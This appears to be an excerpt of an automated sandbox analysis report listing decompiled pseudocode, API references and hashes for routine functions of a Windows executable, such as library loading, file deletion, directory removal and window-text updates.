                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressProc
                                                                    • String ID:
                                                                    • API String ID: 190572456-0
                                                                    • Opcode ID: 87bbede48919e2c320656d28165f2dd41f3e4cb1cd8a5dac7222dfe60dbaf93b
                                                                    • Instruction ID: b41df1fa75d381eed13266955d9feb05bf3a80cdd3b44aa66b38c7297c5ee5d6
                                                                    • Opcode Fuzzy Hash: 87bbede48919e2c320656d28165f2dd41f3e4cb1cd8a5dac7222dfe60dbaf93b
                                                                    • Instruction Fuzzy Hash: 3C11C631604208AFD701DF22CC529AD7BECEB8E714BA2047AF904E3680DB385F549599
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E9E0, Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E0040E9E0(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				short _v530;
				char _v536;
				char _v540;
				void* _t44;
				intOrPtr _t45;
				void* _t49;
				void* _t52;

				_v536 = 0;
				_v540 = 0;
				_v8 = 0;
				_t49 = __eax;
				_push(_t52);
				_push(0x40ea9a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t52 + 0xfffffde8;
				GetModuleFileNameW(0,  &_v530, 0x105);
				E0040B2DC( &_v536, _t49);
				_push(_v536);
				E0040B318( &_v540, 0x105,  &_v530);
				_pop(_t44); // executed
				E0040E8BC(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
				if(_v8 != 0) {
					LoadLibraryExW(E0040B278(_v8), 0, 2);
				}
				_pop(_t45);
				 *[fs:eax] = _t45;
				_push(E0040EAA1);
				E0040A228( &_v540, 2);
				return E0040A1C8( &_v8);
			}











                                                                    0x0040e9ed
                                                                    0x0040e9f3
                                                                    0x0040e9f9
                                                                    0x0040e9fc
                                                                    0x0040ea00
                                                                    0x0040ea01
                                                                    0x0040ea06
                                                                    0x0040ea09
                                                                    0x0040ea1c
                                                                    0x0040ea29
                                                                    0x0040ea34
                                                                    0x0040ea46
                                                                    0x0040ea54
                                                                    0x0040ea55
                                                                    0x0040ea5e
                                                                    0x0040ea6d
                                                                    0x0040ea72
                                                                    0x0040ea76
                                                                    0x0040ea79
                                                                    0x0040ea7c
                                                                    0x0040ea8c
                                                                    0x0040ea99

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileLibraryLoadModuleName
                                                                    • String ID:
                                                                    • API String ID: 1159719554-0
                                                                    • Opcode ID: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
                                                                    • Instruction ID: bfcf378974dcce41ca09e2914a43810c414f47049a433e9fa093b73340916525
                                                                    • Opcode Fuzzy Hash: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
                                                                    • Instruction Fuzzy Hash: 46114270A4021CABDB10EB61DC86BDE73B8EB18304F5145FEA508B72D1DB785E848E99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0062CFB8, Relevance: 3.1, APIs: 2, Instructions: 52comCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 48%
                                                                    			E0062CFB8(void* __ebx) {
				void* _v8;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr* _t22;
				intOrPtr* _t25;
				intOrPtr _t34;
				intOrPtr _t38;

				_push(0);
				_push(_t38);
				_push(0x62d04e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t38;
				if( *0x6d63b4 != 0) {
					L6:
					_pop(_t34);
					 *[fs:eax] = _t34;
					_push(E0062D055);
					return E0040EC28( &_v8);
				}
				if(GetVersion() >= 0x601) {
					_push(E0040EC28( &_v8));
					_t20 =  *0x6ce1cc; // 0x6cd0d4
					_push(_t20);
					_push(1);
					_push(0);
					_t21 =  *0x6cdad4; // 0x6cd0c4
					_push(_t21); // executed
					L0043C1EC(); // executed
					if(_t21 == 0) {
						_t22 = _v8;
						_push(_t22);
						if( *((intOrPtr*)( *_t22 + 0xc))() == 0) {
							_t25 = _v8;
							 *((intOrPtr*)( *_t25 + 4))(_t25);
							E0040EC40(0x6d63b8, _v8);
						}
					}
				}
				 *0x6d63b4 = 1;
				goto L6;
			}










                                                                    0x0062cfbb
                                                                    0x0062cfc0
                                                                    0x0062cfc1
                                                                    0x0062cfc6
                                                                    0x0062cfc9
                                                                    0x0062cfd3
                                                                    0x0062d02e
                                                                    0x0062d03a
                                                                    0x0062d03d
                                                                    0x0062d040
                                                                    0x0062d04d
                                                                    0x0062d04d
                                                                    0x0062cfe0
                                                                    0x0062cfea
                                                                    0x0062cfeb
                                                                    0x0062cff0
                                                                    0x0062cff1
                                                                    0x0062cff3
                                                                    0x0062cff5
                                                                    0x0062cffa
                                                                    0x0062cffb
                                                                    0x0062d002
                                                                    0x0062d004
                                                                    0x0062d007
                                                                    0x0062d00f
                                                                    0x0062d011
                                                                    0x0062d017
                                                                    0x0062d022
                                                                    0x0062d022
                                                                    0x0062d00f
                                                                    0x0062d002
                                                                    0x0062d027
                                                                    0x00000000

                                                                    APIs
                                                                    • GetVersion.KERNEL32(00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFD5
                                                                    • CoCreateInstance.OLE32(006CD0C4,00000000,00000001,006CD0D4,00000000,00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFFB
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateInstanceVersion
                                                                    • String ID:
                                                                    • API String ID: 1462612201-0
                                                                    • Opcode ID: cbb049565a1867f24a50483da30d8e7f142d0e73d3a7e9700637a94f81e4e663
                                                                    • Instruction ID: 9475dfad4fa877b1df6a840545b6a6068a8d92e7f1f871649489f85859f50de3
                                                                    • Opcode Fuzzy Hash: cbb049565a1867f24a50483da30d8e7f142d0e73d3a7e9700637a94f81e4e663
                                                                    • Instruction Fuzzy Hash: F511D231648A04AFEB10EF69ED4AF5A77EEEB45308F4214BAF400D7AA1C775AD10CB15
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005ABB4C, Relevance: 3.0, APIs: 2, Instructions: 50threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 69%
                                                                    			E005ABB4C(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t12;
				intOrPtr _t16;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				void* _t30;
				void* _t31;
				intOrPtr _t32;

				_t30 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_t23 =  *0x6ccbac; // 0x0
				_v12 = _t23;
				_t24 =  *0x6ccbbc; // 0x0
				_v16 = _t24;
				 *0x6ccbac = __eax;
				 *0x6ccbbc = 0;
				_push(_t30);
				_push(0x5abbf9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				 *0x6ccbb8 = 1;
				_push(_t30);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				EnumThreadWindows(GetCurrentThreadId(), 0x5abafc, 0);
				_t12 =  *0x6ccbbc; // 0x0
				_v8 = _t12;
				_pop(_t25);
				 *[fs:eax] = _t25;
				_t26 = 0x5abbbb;
				 *[fs:eax] = _t26;
				_push(E005ABC00);
				 *0x6ccbb8 = 0;
				 *0x6ccbbc = _v16;
				_t16 = _v12;
				 *0x6ccbac = _t16;
				return _t16;
			}















                                                                    0x005abb4d
                                                                    0x005abb4f
                                                                    0x005abb55
                                                                    0x005abb5b
                                                                    0x005abb5e
                                                                    0x005abb64
                                                                    0x005abb67
                                                                    0x005abb6e
                                                                    0x005abb7a
                                                                    0x005abb7b
                                                                    0x005abb80
                                                                    0x005abb83
                                                                    0x005abb86
                                                                    0x005abb8f
                                                                    0x005abb95
                                                                    0x005abb98
                                                                    0x005abba4
                                                                    0x005abba9
                                                                    0x005abbae
                                                                    0x005abbb3
                                                                    0x005abbb6
                                                                    0x005abbd6
                                                                    0x005abbd9
                                                                    0x005abbdc
                                                                    0x005abbe1
                                                                    0x005abbeb
                                                                    0x005abbf0
                                                                    0x005abbf3
                                                                    0x005abbf8

                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 005ABB9E
                                                                    • EnumThreadWindows.USER32(00000000,005ABAFC,00000000), ref: 005ABBA4
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Thread$CurrentEnumWindows
                                                                    • String ID:
                                                                    • API String ID: 2396873506-0
                                                                    • Opcode ID: 50b1606a0afe4943f6b819d05498a248b249cba9426d36aa2a532158776b3fde
                                                                    • Instruction ID: ee6e8008b641080cd7585ababab2aba3c455f5a37fbde39c0718e37cfc8f8a06
                                                                    • Opcode Fuzzy Hash: 50b1606a0afe4943f6b819d05498a248b249cba9426d36aa2a532158776b3fde
                                                                    • Instruction Fuzzy Hash: C5112574A08744AFD711CF66DCA2D6ABFE9E74A720F1194AAE804D3791E7756C00CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060C158, Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 60%
                                                                    			E0060C158(void* __eax, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				int _t13;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E0060BF74(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x60c1b5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_t13 = DeleteFileW(E0040B278(__edx)); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E0060C1BC);
					return E0060BFB0( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}











                                                                    0x0060c159
                                                                    0x0060c15b
                                                                    0x0060c170
                                                                    0x0060c17b
                                                                    0x0060c17c
                                                                    0x0060c181
                                                                    0x0060c184
                                                                    0x0060c18f
                                                                    0x0060c194
                                                                    0x0060c19c
                                                                    0x0060c1a1
                                                                    0x0060c1a4
                                                                    0x0060c1a7
                                                                    0x0060c1b4
                                                                    0x0060c172
                                                                    0x0060c174
                                                                    0x0060c1cd
                                                                    0x0060c1cd

                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C18F
                                                                    • GetLastError.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C197
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DeleteErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 2018770650-0
                                                                    • Opcode ID: 3697c3af58fd59330cb1976570848beae36e068bde04d4d9265381b0fddbc49e
                                                                    • Instruction ID: 318e45fb2803f7fcaacad33ae20e8141f5d943eca3b4fb5a26b9ca9ca2c048f0
                                                                    • Opcode Fuzzy Hash: 3697c3af58fd59330cb1976570848beae36e068bde04d4d9265381b0fddbc49e
                                                                    • Instruction Fuzzy Hash: 9EF0C831A44308ABCB04DFB59C4149FB7E9DB0932075147FAF804D3382E7745E005994
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060C664, Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 60%
                                                                    			E0060C664(void* __eax, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				int _t13;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E0060BF74(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x60c6c1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_t13 = RemoveDirectoryW(E0040B278(__edx)); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E0060C6C8);
					return E0060BFB0( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}











                                                                    0x0060c665
                                                                    0x0060c667
                                                                    0x0060c67c
                                                                    0x0060c687
                                                                    0x0060c688
                                                                    0x0060c68d
                                                                    0x0060c690
                                                                    0x0060c69b
                                                                    0x0060c6a0
                                                                    0x0060c6a8
                                                                    0x0060c6ad
                                                                    0x0060c6b0
                                                                    0x0060c6b3
                                                                    0x0060c6c0
                                                                    0x0060c67e
                                                                    0x0060c680
                                                                    0x0060c6d9
                                                                    0x0060c6d9

                                                                    APIs
                                                                    • RemoveDirectoryW.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C69B
                                                                    • GetLastError.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C6A3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DirectoryErrorLastRemove
                                                                    • String ID:
                                                                    • API String ID: 377330604-0
                                                                    • Opcode ID: 53d77f0b7f1706873743be23e773c9934c7890b647961f754ec8971419ba3f02
                                                                    • Instruction ID: 4dcda24c2f25390586e6dcbd063c7cff493c698b67123ab594910c5e431ffc76
                                                                    • Opcode Fuzzy Hash: 53d77f0b7f1706873743be23e773c9934c7890b647961f754ec8971419ba3f02
                                                                    • Instruction Fuzzy Hash: 86F0C231A94208ABDB14DFB5AC418AFB3E9DB493207514BBAF804E3281EB755E105698
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0042B848, Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 37%
                                                                    			E0042B848(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x42b8ba);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x42b89c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_t9 = LoadLibraryW(E0040B278(_t12)); // executed
				_v12 = _t9;
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(E0042B8A3);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}












                                                                    0x0042b849
                                                                    0x0042b84b
                                                                    0x0042b84f
                                                                    0x0042b852
                                                                    0x0042b857
                                                                    0x0042b85c
                                                                    0x0042b85d
                                                                    0x0042b862
                                                                    0x0042b865
                                                                    0x0042b868
                                                                    0x0042b86d
                                                                    0x0042b86e
                                                                    0x0042b873
                                                                    0x0042b876
                                                                    0x0042b881
                                                                    0x0042b886
                                                                    0x0042b88b
                                                                    0x0042b88e
                                                                    0x0042b891
                                                                    0x0042b896
                                                                    0x0042b898
                                                                    0x0042b89b

                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00008000,00000000), ref: 0042B852
                                                                    • LoadLibraryW.KERNEL32(00000000,00000000,0042B89C,?,00000000,0042B8BA,?,00008000,00000000), ref: 0042B881
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLibraryLoadMode
                                                                    • String ID:
                                                                    • API String ID: 2987862817-0
                                                                    • Opcode ID: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
                                                                    • Instruction ID: 1e325d9ebe5d0822fb749a998e89c34c252ba1fb5941e6000e67edf6569427d0
                                                                    • Opcode Fuzzy Hash: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
                                                                    • Instruction Fuzzy Hash: D6F08270614704BEDB016FB69C5286FBBECEB4AB0079349B6F814A2691E67D581086A8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005B8250, Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E005B8250(void* __eax, void* __edx, void* __eflags) {
				void* _t9;
				void* _t17;
				void* _t22;
				void* _t23;

				_t23 = __eflags;
				_t22 = __edx;
				_t17 = __eax;
				_t9 = E0040B660( *((intOrPtr*)(__eax + 0xa4)), __edx);
				if(_t23 == 0) {
					return _t9;
				}
				if( *((char*)(_t17 + 0xc4)) != 0) {
					if( *((char*)(_t17 + 0xeb)) == 0) {
						SetWindowTextW( *(_t17 + 0x188), E0040B278(__edx));
					} else {
						SetWindowTextW( *(_t17 + 0x188), 0);
					}
				}
				_t6 = _t17 + 0xa4; // 0xa4
				return E0040A5A8(_t6, _t22);
			}







                                                                    0x005b8250
                                                                    0x005b8253
                                                                    0x005b8255
                                                                    0x005b825f
                                                                    0x005b8264
                                                                    0x005b82ac
                                                                    0x005b82ac
                                                                    0x005b826d
                                                                    0x005b8276
                                                                    0x005b8297
                                                                    0x005b8278
                                                                    0x005b8281
                                                                    0x005b8281
                                                                    0x005b8276
                                                                    0x005b829c
                                                                    0x00000000

                                                                    APIs
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 005B8297
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: TextWindow
                                                                    • String ID:
                                                                    • API String ID: 530164218-0
                                                                    • Opcode ID: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
                                                                    • Instruction ID: 06eb74493f32fc7ca45b3b7e2b46e6e7fae3055f649a2dcd14cf2a1bc93d960e
                                                                    • Opcode Fuzzy Hash: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
                                                                    • Instruction Fuzzy Hash: 2AF0A7743015002ADB11AA6A8885BFA678CAF86715F0801BAFE049F387CF785D41C3BA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006AC477, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 35%
                                                                    			E006AC477() {
				void* _t13;
				void* _t15;
				intOrPtr _t16;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t37;
				intOrPtr _t48;
				intOrPtr _t53;
				intOrPtr _t55;
				void* _t56;
				intOrPtr _t57;

				_t13 =  *0x6d68ac(0x6cd804, 0x8000, 0, _t56 - 4); // executed
				if(_t13 != 0) {
					_t15 =  *0x6d68ac(0x6cd814, 0x8000, 0, _t56 - 4); // executed
					if(_t15 != 0) {
						if( *0x6d67dc == 0) {
							_t16 =  *0x6d6534; // 0x0
							E005C4EA4(_t16, _t56 - 0x38);
							E0040B4C8(0x6d6564, L"COMMAND.COM",  *((intOrPtr*)(_t56 - 0x38))); // executed
						} else {
							_t24 =  *0x6d6538; // 0x0
							E005C4EA4(_t24, _t56 - 0x34);
							E0040B4C8(0x6d6564, L"cmd.exe",  *((intOrPtr*)(_t56 - 0x34)));
						}
						E006AC180(); // executed
						_pop(_t48);
						 *[fs:eax] = _t48;
						_push(E006AC58D);
						return E0040A228(_t56 - 0x38, 0xd);
					} else {
						_push(_t56);
						_push(0x6ac516);
						_push( *[fs:eax]);
						 *[fs:eax] = _t57;
						E0040C8BC();
						_pop(_t53);
						 *[fs:eax] = _t53;
						_push(E006AC51D);
						_t32 =  *((intOrPtr*)(_t56 - 4));
						_push(_t32);
						L0043C214();
						return _t32;
					}
				} else {
					_push(_t56);
					_push(0x6ac4c3);
					_push( *[fs:eax]);
					 *[fs:eax] = _t57;
					E0040C8BC();
					_pop(_t55);
					 *[fs:eax] = _t55;
					_push(E006AC4CA);
					_t37 =  *((intOrPtr*)(_t56 - 4));
					_push(_t37);
					L0043C214();
					return _t37;
				}
			}














                                                                    0x006ac487
                                                                    0x006ac48f
                                                                    0x006ac4da
                                                                    0x006ac4e2
                                                                    0x006ac524
                                                                    0x006ac54a
                                                                    0x006ac54f
                                                                    0x006ac561
                                                                    0x006ac526
                                                                    0x006ac529
                                                                    0x006ac52e
                                                                    0x006ac540
                                                                    0x006ac540
                                                                    0x006ac566
                                                                    0x006ac56d
                                                                    0x006ac570
                                                                    0x006ac573
